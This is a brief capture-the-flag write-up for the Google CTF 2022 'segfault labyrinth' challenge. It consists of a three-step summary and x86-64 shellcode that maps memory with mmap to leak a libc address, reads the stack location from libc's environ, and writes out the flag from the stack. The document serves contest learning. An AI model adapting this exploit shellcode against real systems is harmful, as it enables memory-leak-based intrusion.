CTFtime.org / Google Capture The Flag 2022 / segfault labyrinth / Writeup

# TL;DR

Mmap large chunk to get libc address

libc environment to get stack address

use flag reference on stack to print out the flag

```
// mmap large chunk to get libc
mov rax, 9
mov rdi, 0
mov rsi, 0x100000
mov rdx, 0x7
mov r10, 0x22
mov r8, -1
mov r9, 0
syscall

//get stack from libc environ
add rax, 0x2ef600
mov rsp, [rax]

//print flag
mov rax, 1
mov rdi, 1
mov rdx, 0x100
mov rsi, [rsp-0x240]
syscall
```

Original writeup (https://bronson113.github.io/2022/07/05/segfault-labyrinth-GoogleCTF2022.html).

segfault labyrinth